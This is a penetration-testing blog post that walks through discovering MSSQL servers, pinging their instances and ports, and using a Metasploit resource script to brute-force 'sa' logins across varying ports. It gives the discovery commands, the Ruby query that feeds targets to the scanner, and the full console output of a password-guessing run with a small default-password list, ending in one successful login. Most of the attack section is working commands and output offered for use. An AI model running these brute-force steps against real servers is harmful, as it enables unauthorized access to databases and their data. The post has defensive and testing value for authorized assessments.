carnal0wnage [Shared Reader]

Thursday, January 3, 2013

MSSQL Brute forcing with Resource Scripts

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers: 
    SEVERNAME1\SQL2000
    SEVERNAME2\SQL2005


OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.


msf  post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed


with a list of IP addresses...do mssql_ping


msf  auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+]    InstanceName    = MSSQLSERVER
[+]    IsClustered     = No
[+]    tcp             = 1433
[+]    np              = \\servername1\pipe\sql\query
[+]    Version         = 8.00.194
[+]    ServerName      = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+]    InstanceName    = INSTANCE1
[+]    IsClustered     = Yes
[+]    tcp             = 2261
[+]    np              = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+]    Version         = 10.50.1600.1
[+]    ServerName      = SEVERNAME2


Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee

the query:

begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end

We can use that query to populate stuff on the fly for us.

example:


[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource


UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234

No comments: